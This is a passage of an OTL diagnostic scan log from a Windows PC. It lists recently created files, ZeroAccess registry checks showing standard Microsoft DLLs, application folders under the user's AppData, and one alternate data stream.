014,462,976 | ---- | C] () -- C:\Users\Marcin\Desktop\test.exe [2014-06-03 20:12:41 | 002,598,395 | ---- | C] () -- C:\Users\Marcin\Desktop\Sid_Meiers_Pirates_pl.rar [2014-06-02 21:29:20 | 000,000,541 | ---- | C] () -- C:\Users\Public\Desktop\Pirates of the Caribbean.lnk [2014-06-02 18:38:08 | 000,000,834 | ---- | C] () -- C:\Users\Public\Desktop\CCleaner.lnk [2014-06-01 17:55:59 | 004,095,968 | ---- | C] () -- C:\Users\Marcin\Desktop\Opracowanie zagadnień.pdf [2014-05-30 08:39:13 | 000,021,734 | ---- | C] () -- C:\Users\Marcin\AppData\Local\recently-used.xbel [2014-05-29 18:56:26 | 000,223,186 | ---- | C] () -- C:\Users\Marcin\Desktop\przyklad.jpg [2014-05-26 15:26:45 | 000,208,416 | ---- | C] () -- C:\windows\SysNative\drivers\aswVmm.sys [2014-05-26 15:26:45 | 000,065,776 | ---- | C] () -- C:\windows\SysNative\drivers\aswRvrt.sys [2014-05-26 15:26:45 | 000,029,208 | ---- | C] () -- C:\windows\SysNative\drivers\aswHwid.sys [2014-05-23 10:39:14 | 000,000,246 | ---- | C] () -- C:\Users\Marcin\AppData\Roaming\Top Process Monitor_Settings.ini [2014-05-23 10:38:43 | 000,000,119 | ---- | C] () -- C:\Users\Marcin\AppData\Roaming\System Monitor II_UptimeRecord.ini [2014-05-23 10:37:45 | 000,000,006 | ---- | C] () -- C:\Users\Marcin\AppData\Roaming\Network Meter_Usage.ini [2014-05-23 10:37:30 | 000,000,119 | ---- | C] () -- C:\Users\Marcin\AppData\Roaming\Network Monitor II_Traffic.ini [2014-05-23 10:36:18 | 000,000,839 | ---- | C] () -- C:\Users\Marcin\AppData\Roaming\Drives Meter_Settings.ini [2014-05-23 10:35:01 | 000,000,092 | ---- | C] () -- C:\Users\Marcin\AppData\Roaming\Control System_Settings.ini [2014-05-23 10:17:01 | 000,000,285 | ---- | C] () -- C:\Users\Marcin\AppData\Roaming\GPU MeterV2_Settings.ini [2014-05-23 10:07:05 | 000,000,624 | ---- | C] () -- C:\Users\Marcin\AppData\Roaming\All CPU MeterV3_Settings.ini [2014-05-23 09:57:49 | 020,320,256 | ---- | C] () -- C:\Users\Marcin\Desktop\8GadgetPackSetup.msi [2014-05-14 16:01:24 | 000,050,053 | ---- | C] () -- C:\windows\SysNative\srms.dat [2014-05-14 16:01:14 | 000,100,197 | ---- | C] () -- C:\windows\SysNative\RacRules.xml [2014-05-14 15:59:47 | 000,100,197 | ---- | C] () -- C:\windows\SysWow64\RacRules.xml [2014-05-14 15:59:45 | 000,262,335 | ---- | C] () -- C:\windows\SysNative\dfpinc.dat [2014-05-14 14:18:11 | 000,387,210 | ---- | C] () -- C:\windows\SysNative\ApnDatabase.xml [2014-05-13 20:55:38 | 000,151,583 | ---- | C] () -- C:\Users\Marcin\Desktop\Plan sesji egzaminacyjnej zima-2013-2014.pdf [2014-05-13 20:55:35 | 000,139,340 | ---- | C] () -- C:\Users\Marcin\Desktop\Harmonogram egzaminów w SPNJO 2013-2014.pdf [2014-05-13 20:48:07 | 000,001,007 | ---- | C] () -- C:\Users\Marcin\Desktop\Texmaker.lnk [2014-05-12 18:06:10 | 008,731,068 | ---- | C] () -- C:\Users\Marcin\Desktop\GodFatherSountrack.wav [2014-05-12 17:10:49 | 000,745,651 | ---- | C] () -- C:\Users\Marcin\Desktop\IMG_0004.jpg [2014-04-24 18:21:52 | 000,707,504 | ---- | C] () -- C:\Users\Marcin\AppData\Local\unins000.exe [2014-04-24 18:20:38 | 000,011,761 | ---- | C] () -- C:\Users\Marcin\AppData\Local\unins000.msg [2014-04-24 18:20:37 | 000,005,912 | ---- | C] () -- C:\Users\Marcin\AppData\Local\unins000.dat [2014-04-15 09:10:35 | 000,002,255 | ---- | C] () -- C:\windows\SysWow64\WimBootCompress.ini [2014-04-10 22:40:11 | 000,000,069 | ---- | C] () -- C:\Users\Marcin\.gtk-bookmarks [2014-03-23 13:29:35 | 000,240,640 | ---- | C] () -- C:\windows\SysWow64\xvidvfw.dll [2014-03-04 09:49:50 | 000,103,936 | ---- | C] () -- C:\windows\SysWow64\OEMLicense.dll [2014-02-20 19:14:02 | 000,179,377 | ---- | C] () -- C:\windows\SysWow64\xlive.dll.cat [2014-01-23 18:31:12 | 000,030,568 | ---- | C] () -- C:\windows\MusiccityDownload.exe [2014-01-23 18:31:08 | 000,974,848 | ---- | C] () -- C:\windows\SysWow64\cis-2.4.dll [2014-01-23 18:31:08 | 000,081,920 | ---- | C] () -- C:\windows\SysWow64\issacapi_bs-2.3.dll [2014-01-23 18:31:08 | 000,065,536 | ---- | C] () -- C:\windows\SysWow64\issacapi_pe-2.3.dll [2014-01-23 18:31:08 | 000,057,344 | ---- | C] () -- C:\windows\SysWow64\issacapi_se-2.3.dll [2013-12-15 13:07:45 | 000,000,600 | ---- | C] () -- C:\Users\Marcin\AppData\Roaming\winscp.rnd [2013-11-21 18:46:40 | 000,007,598 | ---- | C] () -- C:\Users\Marcin\AppData\Local\Resmon.ResmonCfg [2013-11-13 22:12:28 | 001,065,984 | ---- | C] () -- C:\Users\Marcin\AppData\Local\file__0.localstorage [2013-11-13 20:52:29 | 000,001,121 | R--- | C] () -- C:\windows\SB1260.ini [2013-11-13 20:52:29 | 000,000,917 | R--- | C] () -- C:\windows\OAcfg.ini [2013-11-13 20:52:29 | 000,000,632 | R--- | C] () -- C:\windows\SB1260L.ini [2013-11-13 20:52:24 | 000,246,272 | ---- | C] () -- C:\windows\SysWow64\APOMngr.DLL [2013-11-13 20:52:24 | 000,074,240 | ---- | C] () -- C:\windows\SysWow64\CmdRtr.DLL [2013-11-13 19:42:37 | 000,598,384 | ---- | C] () -- C:\windows\SysWow64\igvpkrng700.bin [2013-11-13 19:42:36 | 000,754,652 | ---- | C] () -- C:\windows\SysWow64\igcodeckrng700.bin [2013-10-01 14:02:30 | 000,303,104 | ---- | C] () -- C:\windows\SysWow64\igdmd32.dll [2013-10-01 14:02:26 | 000,180,736 | ---- | C] () -- C:\windows\SysWow64\igdde32.dll [2013-10-01 14:02:26 | 000,142,848 | ---- | C] () -- C:\windows\SysWow64\igdail32.dll [2013-08-22 17:36:25 | 000,215,943 | ---- | C] () -- C:\windows\SysWow64\dssec.dat [2013-08-22 17:36:24 | 000,000,741 | ---- | C] () -- C:\windows\SysWow64\NOISE.DAT [2013-08-22 16:45:38 | 000,067,584 | --S- | C] () -- C:\windows\bootstat.dat [2013-08-22 09:01:23 | 000,043,131 | ---- | C] () -- C:\windows\mib.bin [2013-08-22 05:32:36 | 000,046,080 | ---- | C] () -- C:\windows\SysWow64\BWContextHandler.dll [2013-08-22 01:55:20 | 000,364,544 | ---- | C] () -- C:\windows\SysWow64\msjetoledb40.dll [2013-08-22 01:52:39 | 000,673,088 | ---- | C] () -- C:\windows\SysWow64\mlang.dat [2013-03-21 15:34:54 | 000,038,744 | ---- | C] () -- C:\windows\SysWow64\dischandler.exe [2013-03-13 21:39:34 | 003,915,776 | ---- | C] () -- C:\windows\SysWow64\ffmpeg.dll [2013-03-13 21:38:34 | 000,112,640 | ---- | C] () -- C:\windows\SysWow64\ff_vfw.dll [2013-03-13 21:35:56 | 000,271,360 | ---- | C] () -- C:\windows\SysWow64\TomsMoComp_ff.dll [2013-03-13 21:35:38 | 000,157,184 | ---- | C] () -- C:\windows\SysWow64\ff_unrar.dll [2013-03-13 21:35:36 | 000,147,456 | ---- | C] () -- C:\windows\SysWow64\ff_libmad.dll [2013-03-13 21:35:36 | 000,099,840 | ---- | C] () -- C:\windows\SysWow64\ff_wmv9.dll [2013-03-13 21:35:34 | 001,525,760 | ---- | C] () -- C:\windows\SysWow64\ff_samplerate.dll [2013-03-13 21:35:34 | 000,211,968 | ---- | C] () -- C:\windows\SysWow64\ff_libdts.dll [2013-03-13 21:35:34 | 000,114,688 | ---- | C] () -- C:\windows\SysWow64\ff_liba52.dll [2013-03-13 21:35:32 | 000,330,240 | ---- | C] () -- C:\windows\SysWow64\ff_libfaad2.dll [2013-03-13 21:35:30 | 000,136,704 | ---- | C] () -- C:\windows\SysWow64\libmpeg2_ff.dll [2012-09-30 00:47:28 | 000,000,178 | ---- | C] () -- C:\windows\SysWow64\Formats.ini [color=#E56717]========== ZeroAccess Check ==========[/color] [2013-11-14 10:22:36 | 000,000,227 | RHS- | M] () -- C:\windows\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] [HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 "" = C:\Windows\SysNative\shell32.dll -- [2014-03-27 11:12:37 | 021,225,584 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] "" = %SystemRoot%\system32\shell32.dll -- [2014-03-27 09:48:28 | 018,679,728 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64 "" = C:\Windows\SysNative\wbem\fastprox.dll -- [2013-08-22 11:49:49 | 000,921,088 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] "" = %systemroot%\system32\wbem\fastprox.dll -- [2013-08-22 04:45:10 | 000,691,712 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64 "" = C:\Windows\SysNative\wbem\wbemess.dll -- [2013-08-22 11:45:17 | 000,483,840 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Both [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] [color=#E56717]========== LOP Check ==========[/color] [2014-04-09 18:20:00 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\.minecraft [2013-12-19 20:14:26 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\.mono [2014-04-21 18:02:47 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\AC3Filter [2014-05-23 10:46:06 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\App Launcher Gadget [2014-04-10 22:10:34 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\Audacity [2014-05-26 15:27:47 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\AVAST Software [2014-05-21 22:50:02 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\AVG [2013-11-15 21:36:18 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\Blender Foundation [2014-04-15 08:50:47 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\Cocoon Software [2014-06-02 20:43:11 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\DAEMON Tools Lite [2013-12-14 21:52:11 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\Dwarfs [2014-03-21 14:12:55 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\e-academy Inc [2013-11-27 22:44:11 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\FileZilla [2014-06-03 17:01:26 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\GG [2013-11-14 08:41:43 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\GHISLER [2014-04-10 22:41:47 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\gtk-2.0 [2013-11-20 12:05:38 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\MonoDevelop-Unity-4.0 [2013-12-05 20:23:33 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\NapiProjekt [2014-01-22 11:09:37 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\Notepad++ [2014-03-22 14:59:21 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\NuGet [2014-05-21 22:47:41 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\OpenCandy [2013-12-10 17:45:53 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\Opera Software [2014-03-29 00:36:27 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\Origin [2014-03-11 18:54:44 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\rmi [2014-04-18 21:22:07 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\Samsung [2014-04-11 10:43:19 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\SendSpace [2014-04-12 22:34:27 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\SpaceEngineers [2013-11-20 12:05:36 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\stetic [2014-03-12 11:36:48 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\Subversion [2013-12-10 18:04:33 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\TCB Networks [2013-11-30 14:02:23 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\Ubisoft [2013-12-18 18:39:54 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\Unity [2014-06-02 20:44:29 | 000,000,000 | ---D | M] -- C:\Users\Marcin\AppData\Roaming\uTorrent [color=#E56717]========== Purity Check ==========[/color] [color=#E56717]========== Alternate Data Streams ==========[/color] @Alternate Data Stream - 183 bytes -> C:\Users\Marcin\SkyDrive:ms-properties < End of report >